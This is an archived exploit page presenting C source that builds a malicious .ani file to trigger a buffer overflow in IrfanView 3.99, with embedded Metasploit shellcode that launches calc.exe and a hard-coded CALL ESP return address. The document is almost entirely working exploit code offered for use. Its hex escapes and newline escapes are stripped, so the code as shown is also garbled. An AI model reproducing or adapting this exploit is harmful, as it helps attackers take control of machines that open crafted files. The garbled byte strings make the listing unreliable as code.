IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit
# Published : 2007-04-02
# Author : Marsu
# Previous Title : MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit
# Next Title : Corel Wordperfect X3 13.0.0.565 (.PRS) Local Buffer Overflow Exploit

/***************************************************************************
*                IrfanView 3.99 .ANI File Buffer Overflow                  *
*                                                                          *
*                                                                          *
* IrfanView is vulnerable to a buffer overflow when opening a crafted .ani *
* file. The overflow occurs while it is creating a snapshot of the file.   *
* This exploit launches calc.exe.                                          *
*                                                                          *
* Tested against Win XP SP2 FR.                                            *
* Have Fun!                                                                *
*                                                                          *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>               *
*                                                                          *
* Note: this has nothing in common with the LoadAniIcon Stack Overflow.    *
***************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x26"
"x45x32xe3x83xebxfcxe2xf4xdaxadx76xe3x26x45xb9xa6"
"x1axcex4exe6x5ex44xddx68x69x5dxb9xbcx06x44xd9xaa"
"xadx71xb9xe2xc8x74xf2x7ax8axc1xf2x97x21x84xf8xee"
"x27x87xd9x17x1dx11x16xe7x53xa0xb9xbcx02x44xd9x85"
"xadx49x79x68x79x59x33x08xadx59xb9xe2xcdxccx6exc7"
"x22x86x03x23x42xcex72xd3xa3x85x4axefxadx05x3ex68"
"x56x59x9fx68x4ex4dxd9xeaxadxc5x82xe3x26x45xb9x8b"
"x1ax1ax03x15x46x13xbbx1bxa5x85x49xb3x4ex3bxeax01"
"x55x2dxaax1dxacx4bx65x1cxc1x26x53x8fx45x6bx57x9b"
"x43x45x32xe3";

unsigned char Ani_headers[] = 
"x52x49x46x46x2ax16x00x00x41x43x4fx4ex4cx49x53x54"
"x44x00x00x00x49x4ex46x4fx49x4ex41x4dx0ax00x00x00"
"x4dx65x74x72x6fx6ex6fx6dx65x00x49x41x52x54x26x00"
"x00x00x4dx61x72x73x75x70x69x6cx61x6dx69x50x6fx77"
"x61x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx20x4dx61"
"x72x63x68x20x20x30x37x00x61x6ex69x68x24x10x00x00"
"x24";


int main(int argc, char* argv[])
{
	FILE* anifile;
	char evilbuff[1000];
	int ani_size;
	
	printf("[+] IrfanView 3.99 .ANI File Buffer Overflown");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ani>n",argv[0]);
		return 0;
	}
	
	ani_size=sizeof(Ani_headers)-1;
	memset(evilbuff,'C',1000);
	memcpy(evilbuff,Ani_headers,ani_size);
	memcpy(evilbuff+ani_size+459,"x8bx51x81x7c",4); 				/* CALL ESP in Kernel32.dll */
	memcpy(evilbuff+ani_size+466,CalcShellcode,strlen(CalcShellcode));
	memset(evilbuff+ani_size+466+strlen(CalcShellcode)+10,0,1);
	
	anifile=fopen(argv[1],"wb");
	fwrite( evilbuff, 1, sizeof(evilbuff), anifile );
	fclose(anifile);
	printf("[+] Done. Have fun!n");
	return 0;
	
}

// www.Syue.com [2007-04-02]